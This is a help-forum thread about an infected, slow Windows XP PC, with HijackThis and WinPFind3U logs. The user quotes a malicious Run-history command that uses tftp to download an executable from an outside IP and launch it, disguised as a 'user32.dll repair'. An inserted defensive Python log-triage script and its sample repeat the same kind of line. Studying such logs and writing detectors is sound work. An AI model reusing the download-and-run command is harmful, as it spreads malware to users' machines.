
Slow Computer - Hijackthis Logs


6 replies to this topic

#1 DigitalFool

DigitalFool

  • Members
  • 39 posts

Posted 02 June 2007 - 06:44 PM

Computer has been going really slow - ran Ad-Aware and Search and Destroy and cleaned up some things. Also found various weird-named .exe files that were all in the system32 folder and were put there on the same date a few days ago - those have been deleted, as I could not find any search results on them after I ended task on them. Also had many of these in my Start > Run history - %comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 69.157.107.38 GET qweiht.exe & start qweiht& (this is how I knew I could be safe deleting the exe files)

My only last concern is that when I do a netstat, I see cloud.dnsprotect.com a lot and n2192837890147.netvigator.com, and also when I leave my computer with no web apps open, my connection stats rise very quickly, both sent and received. Logs below, and thanks for the help:


~~


Logfile of HijackThis v1.99.1
Scan saved at 6:37:16 PM, on 6/2/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\CA\eTrust EZ Armor\eTrust EZ Antivirus\ISafe.exe
C:\WINDOWS\System32\CTsvcCDA.exe
C:\Program Files\Microsoft SQL Server\MSSQL$FRANKLIN_SQL_DAT\Binn\sqlservr.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\WINDOWS\System32\svchost.exe
C:\Program Files\CA\eTrust EZ Armor\eTrust EZ Antivirus\VetMsg.exe
C:\Program Files\Viewpoint\Common\ViewpointService.exe
C:\Program Files\RealVNC\VNC4\WinVNC4.exe
C:\WINDOWS\System32\MsPMSPSv.exe
C:\Program Files\Wireless-G Portable USB Adapter\WLService.exe
C:\Program Files\Wireless-G Portable USB Adapter\WUSB54GP.exe
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Viewpoint\Viewpoint Manager\ViewMgr.exe
C:\Program Files\Common Files\Dell\EUSW\Support.exe
C:\Program Files\Java\j2re1.4.2_04\bin\jusched.exe
C:\Program Files\Logitech\Video\LogiTray.exe
C:\WINDOWS\system32\RUNDLL32.EXE
C:\Program Files\CA\eTrust EZ Armor\eTrust EZ Antivirus\CAVTray.exe
C:\Program Files\CA\eTrust EZ Armor\eTrust EZ Antivirus\CAVRID.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Sony Handheld\HOTSYNC.EXE
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpobnz08.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpotdd01.exe
C:\Program Files\Creative\SBLive\Diagnostics\diagent.exe
C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
C:\Program Files\Sony Handheld\USBSwt.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\WINDOWS\System32\LVComsX.exe
C:\Program Files\Logitech\Video\FxSvr2.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpoevm08.exe
C:\WINDOWS\System32\HPZipm12.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\Bin\hpoSTS08.exe
C:\Downloaded Full Apps\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.dell4me.com/myway
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://g.msn.com/0SEENUS/SAOS01
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.dell4me.com/myway
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.dell4me.com/myway
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: DriveLetterAccess - {5CA3D70E-1895-11CF-8E15-001234567890} - C:\WINDOWS\system32\dla\tfswshx.dll
O2 - BHO: ST - {9394EDE7-C8B5-483E-8773-474BF36AF6E4} - C:\Program Files\MSN Apps\ST\01.03.0000.1005\en-xu\stmain.dll
O2 - BHO: MSNToolBandBHO - {BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\MSN Apps\MSN Toolbar\MSN Toolbar\01.02.5000.1021\en-us\msntb.dll
O3 - Toolbar: (no name) - {BA52B914-B692-46c4-B683-905236F6F655} - (no file)
O3 - Toolbar: MSN - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\MSN Apps\MSN Toolbar\MSN Toolbar\01.02.5000.1021\en-us\msntb.dll
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [diagent] "C:\Program Files\Creative\SBLive\Diagnostics\diagent.exe" startup
O4 - HKLM\..\Run: [DwlClient] C:\Program Files\Common Files\Dell\EUSW\Support.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\j2re1.4.2_04\bin\jusched.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [LogitechVideoRepair] C:\Program Files\Logitech\Video\ISStart.exe
O4 - HKLM\..\Run: [LogitechVideoTray] C:\Program Files\Logitech\Video\LogiTray.exe
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\System32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [CaAvTray] "C:\Program Files\CA\eTrust EZ Armor\eTrust EZ Antivirus\CAVTray.exe"
O4 - HKLM\..\Run: [CAVRID] "C:\Program Files\CA\eTrust EZ Armor\eTrust EZ Antivirus\CAVRID.exe"
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\MSN Messenger\msnmsgr.exe" /background
O4 - HKCU\..\Run: [MoneyAgent] "C:\Program Files\Microsoft Money\System\mnyexpr.exe"
O4 - HKCU\..\Run: [LogitechSoftwareUpdate] "C:\Program Files\Logitech\Video\ManifestEngine.exe" boot
O4 - Startup: PowerReg Scheduler V3.exe
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: D-Link AirPlus G Configuration Utility.lnk = ?
O4 - Global Startup: HotSync Manager.lnk = C:\Program Files\Sony Handheld\HOTSYNC.EXE
O4 - Global Startup: hp psc 2000 Series.lnk = C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpobnz08.exe
O4 - Global Startup: hpoddt01.exe.lnk = ?
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
O4 - Global Startup: Service Manager.lnk = C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
O4 - Global Startup: Sony PDA USB Switcher.lnk = C:\Program Files\Sony Handheld\USBSwt.exe
O4 - Global Startup: SonyPDA USB Switcher.lnk = C:\Program Files\Sony Handheld\USBSwt.exe
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~4\Office10\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\System32\msjava.dll (file missing)
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\System32\msjava.dll (file missing)
O9 - Extra button: ICQ Pro - {6224f700-cba3-4071-b251-47cb894244cd} - C:\PROGRA~1\ICQ\ICQ.exe
O9 - Extra 'Tools' menuitem: ICQ - {6224f700-cba3-4071-b251-47cb894244cd} - C:\PROGRA~1\ICQ\ICQ.exe
O9 - Extra button: PartyPoker.com - {B7FE5D70-9AA2-40F1-9C6B-12A255F085E1} - C:\Program Files\PartyPoker\PartyPoker.exe
O9 - Extra 'Tools' menuitem: PartyPoker.com - {B7FE5D70-9AA2-40F1-9C6B-12A255F085E1} - C:\Program Files\PartyPoker\PartyPoker.exe
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\System32\Shdocvw.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O16 - DPF: {4C39376E-FA9D-4349-BACC-D305C1750EF3} (EPUImageControl Class) - http://tools.ebayimg.com/eps/wl/activex/eB...l_v1-0-3-30.cab
O16 - DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} (MSN Photo Upload Tool) - http://by103fd.bay103.hotmail.msn.com/resources/MsnPUpld.cab
O16 - DPF: {8E0D4DE5-3180-4024-A327-4DFAD1796A8D} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/Messe...nt.cab31267.cab
O16 - DPF: {AB86CE53-AC9F-449F-9399-D8ABCA09EC09} (Get_ActiveX Control) - https://h17000.www1.hp.com/ewfrf-JAVA/Secur...loadManager.ocx
O16 - DPF: {D1E7CBDA-E60E-4970-A01C-37301EF7BF98} (Measurement Services Client v.3.7) - http://gameadvisor.futuremark.com/global/msc37.cab
O20 - Winlogon Notify: WgaLogon - C:\WINDOWS\SYSTEM32\WgaLogon.dll
O23 - Service: CAISafe - Computer Associates International, Inc. - C:\Program Files\CA\eTrust EZ Armor\eTrust EZ Antivirus\ISafe.exe
O23 - Service: Creative Service for CDROM Access - Creative Technology Ltd - C:\WINDOWS\System32\CTsvcCDA.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: spupdsvc. (Microsoft Update RunOnce Service) - Unknown owner - C:\WINDOWS\spupdsvc.exe" /service (file missing)
O23 - Service: Intel NCS NetService (NetSvc) - Intel® Corporation - C:\Program Files\Intel\NCS\Sync\NetSvc.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\System32\HPZipm12.exe
O23 - Service: VET Message Service (VETMSGNT) - Computer Associates International, Inc. - C:\Program Files\CA\eTrust EZ Armor\eTrust EZ Antivirus\VetMsg.exe
O23 - Service: Viewpoint Manager Service - Viewpoint Corporation - C:\Program Files\Viewpoint\Common\ViewpointService.exe
O23 - Service: VNC Server Version 4 (WinVNC4) - Unknown owner - C:\Program Files\RealVNC\VNC4\WinVNC4.exe" -service (file missing)
O23 - Service: WUSB54GPSVC - Unknown owner - C:\Program Files\Wireless-G Portable USB Adapter\WLService.exe" "WUSB54GP.exe (file missing)
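One way to triage a HijackThis log like the one above mechanically, as an added example that is not part of the original thread and is not code from HijackThis or BleepingComputer: parse each entry by its section code and apply a handful of defender-side heuristics (an O4 autostart that invokes a command shell or a TFTP/FTP transfer, an O2 BHO or O3 toolbar with no name or no file, an O23 service with no vendor or a binary the scanner could not locate). The sample lines are constructed for the example: most echo the kinds of entries seen in the log above, but the O4 line carrying the tftp command and the 192.0.2.10 address are made up. The rule table, the severity ranking and the "possibly a parsing quirk" downgrade for service paths with the closing quote glued to the .exe are assumptions of this example, meant to prioritise what a human reviews, not to pronounce a verdict.

```python
import re

# HijackThis entries look like "O4 - HKLM\..\Run: [name] command"; the leading token is the
# section code (R0, R1, O2, O4, O23, ...) that says which kind of hook the entry describes.
ENTRY_RE = re.compile(r'^(?P<code>[RFO]\d{1,2}) - (?P<body>.+)$')

# HijackThis 1.99.1 prints service paths with the closing quote glued to the .exe and the
# arguments after it (e.g. ...\WinVNC4.exe" -service). When "(file missing)" appears on such
# a line it may be a parsing quirk rather than a truly absent binary, so the triage downgrades
# it and asks for confirmation with another scanner (assumption of this example).
QUOTED_ARGS_RE = re.compile(r'\.exe"\s+\S')

# (rule id, section code, pattern over the entry body, severity, reason). Heuristics only.
RULES = [
    ('run_shell', 'O4', re.compile(r'%comspec%|\bcmd(?:\.exe)?\s+/c\b|\btftp\b|\bftp\s+-s\b', re.I),
     'high', 'autostart entry runs a command shell or a TFTP/FTP transfer'),
    ('bho_noname', 'O2', re.compile(r'\(no name\)'), 'medium', 'BHO with no name; identify it by CLSID'),
    ('toolbar_orphan', 'O3', re.compile(r'\(no file\)'), 'low', 'toolbar entry whose file is gone'),
    ('button_missing', 'O9', re.compile(r'\(file missing\)'), 'low', 'IE button whose file is missing'),
    ('svc_missing', 'O23', re.compile(r'\(file missing\)'), 'medium', 'service binary not found'),
    ('svc_noowner', 'O23', re.compile(r'Unknown owner'), 'low', 'service without vendor information'),
    ('activex', 'O16', re.compile(r'^DPF:'), 'info', 'ActiveX control installed from a URL'),
]

SEVERITY_RANK = {'none': 0, 'info': 1, 'low': 2, 'medium': 3, 'high': 4}


def triage(log_text):
    """Return one finding per matching rule: {'code', 'severity', 'reason', 'entry'}."""
    findings = []
    for raw in log_text.splitlines():
        entry = raw.strip()
        m = ENTRY_RE.match(entry)
        if not m:
            continue  # header lines, running-process paths and blanks carry no section code
        code, body = m.group('code'), m.group('body')
        for rule_id, rule_code, pattern, severity, reason in RULES:
            if code != rule_code or not pattern.search(body):
                continue
            if rule_id == 'svc_missing' and QUOTED_ARGS_RE.search(body):
                severity = 'low'
                reason += (' (quoted path followed by arguments: possibly a HijackThis '
                           'parsing quirk; confirm with a second scanner)')
            findings.append({'code': code, 'severity': severity, 'reason': reason, 'entry': entry})
    return findings


def worst_severity(findings):
    """Highest severity across the findings, or 'none' for an empty list."""
    return max((f['severity'] for f in findings), key=SEVERITY_RANK.get, default='none')


# Constructed sample in HijackThis v1.99.1 format. The O4 line carrying the tftp command and
# the 192.0.2.10 address are made up for this example; the others echo real entry shapes.
SAMPLE_LOG = r"""
Logfile of HijackThis v1.99.1
C:\WINDOWS\System32\smss.exe
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O3 - Toolbar: (no name) - {BA52B914-B692-46c4-B683-905236F6F655} - (no file)
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [qweiht] %comspec% /c echo Repairing user32.dll & tftp -i 192.0.2.10 GET qweiht.exe & start qweiht
O4 - Startup: PowerReg Scheduler V3.exe
O16 - DPF: {D1E7CBDA-E60E-4970-A01C-37301EF7BF98} (Measurement Services Client v.3.7) - http://gameadvisor.futuremark.com/global/msc37.cab
O23 - Service: VNC Server Version 4 (WinVNC4) - Unknown owner - C:\Program Files\RealVNC\VNC4\WinVNC4.exe" -service (file missing)
O23 - Service: spupdsvc. (Microsoft Update RunOnce Service) - Unknown owner - C:\WINDOWS\spupdsvc.exe" /service (file missing)
"""

if __name__ == '__main__':
    results = triage(SAMPLE_LOG)
    for f in sorted(results, key=lambda f: -SEVERITY_RANK[f['severity']]):
        print(f"[{f['severity']:>6}] {f['code']:<4} {f['reason']}\n         {f['entry']}")
    print('overall:', worst_severity(results))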


#2 OldTimer

OldTimer

    Malware Expert


  • Members
  • 11,092 posts
  • Gender:Male
  • Location:North Carolina

Posted 07 June 2007 - 02:15 PM

Hello DigitalFool and welcome to the BC HijackThis forum. I don't see any signs of viruses or malware in the log. It is clean.

Let's check with a different scanner and see if it shows anything.

Download WinPFind3u.exe to your Desktop and double-click on it to extract the files. It will create a folder named WinPFind3u on your desktop.

Note: You must be logged on to the system with an account that has Administrator privileges to run this program.
  • Close ALL OTHER PROGRAMS.
  • Open the WinPFind3u folder and double-click on WinPFind3U.exe to start the program.
  • Do not change any other settings.
  • Now click the Run Scan button on the toolbar.
  • Let it run unhindered until it finishes.
  • When the scan is complete Notepad will open with the report file loaded in it.
  • Click the Format menu and make sure that Wordwrap is not checked. If it is, click on it to uncheck it.
Use the Add Reply button and Copy/Paste the information back here. I will review it when it comes in.

If, after posting, the last line is not < End of Report >, then the log is too big to fit into a single post and you will need to split it into multiple posts.

Cheers.

OT
I do not respond to PMs requesting help. That's what the forums are here for. Please use them so that others may benefit from your questions and the responses you receive.
OldTimer


#3 DigitalFool

DigitalFool
  • Topic Starter

  • Members
  • 39 posts

Posted 11 June 2007 - 10:30 PM

WinPFind3 logfile created on: 6/11/2007 9:58:46 PM
WinPFind3U by OldTimer - Version 1.0.38 Folder = C:\Documents and Settings\Admin\Desktop\WinPFind3u\
Microsoft Windows XP Service Pack 2 (Version = 5.1.2600)
Internet Explorer (Version = 6.0.2900.2180)

510.98 Mb Total Physical Memory | 177.35 Mb Available Physical Memory | 34.71% Memory free
1.22 Gb Paging File | 0.88 Gb Available in Paging File | 72.14% Paging File free
Paging file location(s): C:\pagefile.sys 1028 2056;

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 36.97 Gb Total Space | 3.88 Gb Free Space | 10.50% Space Free
D: Drive not present or media not loaded
E: Drive not present or media not loaded
F: Drive not present or media not loaded

Computer Name: FAMILY
Current User Name: Admin
Logged in as Administrator.
Current Boot Mode: Normal


[Processes - Non-Microsoft Only]
a.exe -> %System32%\a.exe -> [Ver = | Size = 521728 bytes | Modified Date = 6/10/2007 2:04:02 AM | Attr = ]
cavrid.exe -> %ProgramFiles%\CA\eTrust EZ Armor\eTrust EZ Antivirus\CAVRid.exe -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 185456 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
cavtray.exe -> %ProgramFiles%\CA\eTrust EZ Armor\eTrust EZ Antivirus\CAVTray.exe -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 230512 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
ctsvccda.exe -> %System32%\CTsvcCDA.EXE -> Creative Technology Ltd [Ver = 1.0.1.0 | Size = 44032 bytes | Modified Date = 12/13/1999 2:01:00 AM | Attr = ]
diagent.exe -> %ProgramFiles%\Creative\SBLive\Diagnostics\diagent.exe -> Creative Technology Ltd [Ver = 1, 1, 4, 0 | Size = 135264 bytes | Modified Date = 4/3/2002 2:01:00 AM | Attr = ]
fxsvr2.exe -> %ProgramFiles%\Logitech\Video\FxSvr2.exe -> Logitech Inc. [Ver = 8.4.6.1012 | Size = 192512 bytes | Modified Date = 1/18/2005 5:08:36 PM | Attr = ]
hotsync.exe -> %ProgramFiles%\Sony Handheld\HOTSYNC.EXE -> Palm, Inc. [Ver = 4.0.1 | Size = 299008 bytes | Modified Date = 5/31/2001 9:52:46 AM | Attr = ]
hpobnz08.exe -> %ProgramFiles%\Hewlett-Packard\Digital Imaging\bin\hpobnz08.exe -> Hewlett-Packard Co. [Ver = 4.2.0.021 | Size = 323646 bytes | Modified Date = 4/9/2003 6:41:38 PM | Attr = ]
hpoevm08.exe -> %ProgramFiles%\Hewlett-Packard\Digital Imaging\bin\hpoevm08.exe -> Hewlett-Packard Co. [Ver = 4.2.0.021 | Size = 286720 bytes | Modified Date = 4/9/2003 6:49:36 PM | Attr = ]
hposts08.exe -> %ProgramFiles%\Hewlett-Packard\Digital Imaging\bin\hposts08.exe -> Hewlett-Packard Co. [Ver = 4.2.0.021 | Size = 311296 bytes | Modified Date = 4/9/2003 6:59:24 PM | Attr = ]
hpotdd01.exe -> %ProgramFiles%\Hewlett-Packard\Digital Imaging\bin\hpotdd01.exe -> Hewlett-Packard [Ver = 1, 0, 0, 1 | Size = 28672 bytes | Modified Date = 4/9/2003 7:11:12 PM | Attr = ]
hpzipm12.exe -> %System32%\HPZipm12.exe -> HP [Ver = 6, 0, 0, 0 | Size = 65795 bytes | Modified Date = 3/9/2003 3:31:02 PM | Attr = ]
ipodservice.exe -> %ProgramFiles%\iPod\bin\iPodService.exe -> Apple Computer, Inc. [Ver = 7.0.2.16 | Size = 492608 bytes | Modified Date = 10/30/2006 10:36:32 AM | Attr = ]
isafe.exe -> %ProgramFiles%\CA\eTrust EZ Armor\eTrust EZ Antivirus\iSafe.exe -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 259184 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
istjor.exe -> %System32%\istjor.exe -> [Ver = | Size = 4096 bytes | Modified Date = 6/10/2007 2:03:56 AM | Attr = R ]
istjor.exe -> %System32%\istjor.exe -> [Ver = | Size = 4096 bytes | Modified Date = 6/10/2007 2:03:56 AM | Attr = R ]
istjor.exe -> %System32%\istjor.exe -> [Ver = | Size = 4096 bytes | Modified Date = 6/10/2007 2:03:56 AM | Attr = R ]
istjor.exe -> %System32%\istjor.exe -> [Ver = | Size = 4096 bytes | Modified Date = 6/10/2007 2:03:56 AM | Attr = R ]
istjor.exe -> %System32%\istjor.exe -> [Ver = | Size = 4096 bytes | Modified Date = 6/10/2007 2:03:56 AM | Attr = R ]
istjor.exe -> %System32%\istjor.exe -> [Ver = | Size = 4096 bytes | Modified Date = 6/10/2007 2:03:56 AM | Attr = R ]
ituneshelper.exe -> %ProgramFiles%\iTunes\iTunesHelper.exe -> Apple Computer, Inc. [Ver = 7.0.2.16 | Size = 256576 bytes | Modified Date = 10/30/2006 10:36:36 AM | Attr = ]
jusched.exe -> %ProgramFiles%\Java\j2re1.4.2_04\bin\jusched.exe -> [Ver = | Size = 32881 bytes | Modified Date = 2/22/2004 11:44:44 PM | Attr = ]
logitray.exe -> %ProgramFiles%\Logitech\Video\LogiTray.exe -> Logitech Inc. [Ver = 8.4.6.1012 | Size = 217088 bytes | Modified Date = 1/18/2005 5:37:30 PM | Attr = ]
lvcomsx.exe -> %System32%\LVCOMSX.EXE -> Logitech Inc. [Ver = 8.4.1.1092 | Size = 221184 bytes | Modified Date = 10/8/2004 11:52:32 AM | Attr = ]
notifyalert.exe -> %ProgramFiles%\Dell\Support\Alert\bin\NotifyAlert.exe -> [Ver = 2.1.0.72 | Size = 352256 bytes | Modified Date = 10/7/2003 5:20:18 PM | Attr = ]
qttask.exe -> %ProgramFiles%\QuickTime\qttask.exe -> Apple Computer, Inc. [Ver = 7.1.3 | Size = 282624 bytes | Modified Date = 10/25/2006 7:58:18 PM | Attr = ]
support.exe -> %CommonProgramFiles%\Dell\EUSW\Support.exe -> Dell [Ver = 2, 1, 1, 0 | Size = 323584 bytes | Modified Date = 5/27/2004 9:05:42 PM | Attr = ]
usbswt.exe -> %ProgramFiles%\Sony Handheld\USBSwt.exe -> Sony Corporation [Ver = 1.10.0008210 | Size = 57344 bytes | Modified Date = 2/2/2001 12:13:00 AM | Attr = ]
vetmsg.exe -> %ProgramFiles%\CA\eTrust EZ Armor\eTrust EZ Antivirus\VetMsg.exe -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 201840 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
viewmgr.exe -> %ProgramFiles%\Viewpoint\Viewpoint Manager\ViewMgr.exe -> Viewpoint Corporation [Ver = 2, 0, 0, 54 | Size = 112336 bytes | Modified Date = 1/4/2007 4:38:20 PM | Attr = ]
viewpointservice.exe -> %ProgramFiles%\Viewpoint\Common\ViewpointService.exe -> Viewpoint Corporation [Ver = 2, 0, 0, 54 | Size = 24652 bytes | Modified Date = 1/4/2007 4:38:10 PM | Attr = ]
winpfind3u.exe -> %UserDesktop%\WinPFind3u\WinPFind3U.exe -> OldTimer Tools [Ver = 1.0.38.0 | Size = 318976 bytes | Modified Date = 5/22/2007 6:27:40 PM | Attr = ]
winvnc4.exe -> %ProgramFiles%\RealVNC\VNC4\winvnc4.exe -> RealVNC Ltd. [Ver = 4.1.1 | Size = 455632 bytes | Modified Date = 3/11/2005 2:40:26 PM | Attr = ]
wlservice.exe -> %ProgramFiles%\Wireless-G Portable USB Adapter\WLService.exe -> GEMTEKS [Ver = 1, 0, 0, 4 | Size = 41025 bytes | Modified Date = 2/6/2004 10:56:14 PM | Attr = ]
wusb54gp.exe -> %ProgramFiles%\Wireless-G Portable USB Adapter\WUSB54GP.exe -> Cisco Linksys Corporation [Ver = 1.0.2.5 | Size = 4314112 bytes | Modified Date = 2/9/2004 4:38:22 PM | Attr = ]

[Win32 Services - Non-Microsoft Only]
(CAISafe) CAISafe [Win32_Own | Auto | Running] -> %ProgramFiles%\CA\eTrust EZ Armor\eTrust EZ Antivirus\iSafe.exe -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 259184 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
(Creative Service for CDROM Access) Creative Service for CDROM Access [Win32_Own | Auto | Running] -> %System32%\CTsvcCDA.EXE -> Creative Technology Ltd [Ver = 1.0.1.0 | Size = 44032 bytes | Modified Date = 12/13/1999 2:01:00 AM | Attr = ]
(dmadmin) Logical Disk Manager Administrative Service [Win32_Shared | On_Demand | Stopped] -> %System32%\dmadmin.exe -> Microsoft Corp., Veritas Software [Ver = 2600.2180.503.0 | Size = 224768 bytes | Modified Date = 8/4/2004 2:56:48 AM | Attr = ]
(IDriverT) InstallDriver Table Manager [Win32_Own | On_Demand | Stopped] -> %CommonProgramFiles%\InstallShield\Driver\11\Intel 32\IDriverT.exe -> Macrovision Corporation [Ver = 11.00.28844 | Size = 69632 bytes | Modified Date = 4/4/2005 1:41:10 AM | Attr = ]
(iPod Service) iPod Service [Win32_Own | On_Demand | Running] -> %ProgramFiles%\iPod\bin\iPodService.exe -> Apple Computer, Inc. [Ver = 7.0.2.16 | Size = 492608 bytes | Modified Date = 10/30/2006 10:36:32 AM | Attr = ]
(Microsoft Update RunOnce Service) spupdsvc. [Win32_Own | Auto | Stopped] -> %SystemRoot%\spupdsvc.exe -> [Ver = | Size = 201708 bytes | Modified Date = 3/31/2007 11:44:28 PM | Attr = ]
(NetSvc) Intel NCS NetService [Win32_Own | On_Demand | Stopped] -> %ProgramFiles%\Intel\NCS\Sync\NetSvc.exe -> Intel® Corporation [Ver = 1.2.26.0 | Size = 143360 bytes | Modified Date = 3/3/2003 2:33:40 PM | Attr = ]
(NVSvc) NVIDIA Display Driver Service [Win32_Own | Auto | Stopped] -> %System32%\nvsvc32.exe -> NVIDIA Corporation [Ver = 6.14.10.8185 | Size = 131139 bytes | Modified Date = 10/10/2005 10:49:00 PM | Attr = ]
(Pml Driver HPZ12) Pml Driver HPZ12 [Win32_Own | On_Demand | Running] -> %System32%\HPZipm12.exe -> HP [Ver = 6, 0, 0, 0 | Size = 65795 bytes | Modified Date = 3/9/2003 3:31:02 PM | Attr = ]
(VETMSGNT) VET Message Service [Win32_Own | Auto | Running] -> %ProgramFiles%\CA\eTrust EZ Armor\eTrust EZ Antivirus\VetMsg.exe -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 201840 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
(Viewpoint Manager Service) Viewpoint Manager Service [Win32_Own | Auto | Running] -> %ProgramFiles%\Viewpoint\Common\ViewpointService.exe -> Viewpoint Corporation [Ver = 2, 0, 0, 54 | Size = 24652 bytes | Modified Date = 1/4/2007 4:38:10 PM | Attr = ]
(WinVNC4) VNC Server Version 4 [Win32_Own | Auto | Running] -> %ProgramFiles%\RealVNC\VNC4\winvnc4.exe -> RealVNC Ltd. [Ver = 4.1.1 | Size = 455632 bytes | Modified Date = 3/11/2005 2:40:26 PM | Attr = ]
(WUSB54GPSVC) WUSB54GPSVC [Win32_Own | Auto | Running] -> %ProgramFiles%\Wireless-G Portable USB Adapter\WLService.exe -> GEMTEKS [Ver = 1, 0, 0, 4 | Size = 41025 bytes | Modified Date = 2/6/2004 10:56:14 PM | Attr = ]

[Driver Services - Non-Microsoft Only]
(a347bus) a347bus [Kernel | Boot | Running] -> %System32%\DRIVERS\a347bus.sys -> [Ver = 3.47.0.0 built by: WinDDK | Size = 160640 bytes | Modified Date = 4/30/2004 9:37:02 AM | Attr = ]
(a347scsi) a347scsi [Kernel | Boot | Running] -> %System32%\DRIVERS\a347scsi.sys -> [Ver = 3.47.0.0 built by: WinDDK | Size = 5248 bytes | Modified Date = 4/30/2004 9:33:00 AM | Attr = ]
(Abiosdsk) Abiosdsk [Kernel | Disabled | Stopped] -> -> File not found
(AFS2K) AFS2K [Kernel | System | Running] -> %System32%\drivers\AFS2K.SYS -> Oak Technology Inc. [Ver = 3.1.21.1103 | Size = 35840 bytes | Modified Date = 10/7/2004 8:16:04 PM | Attr = ]
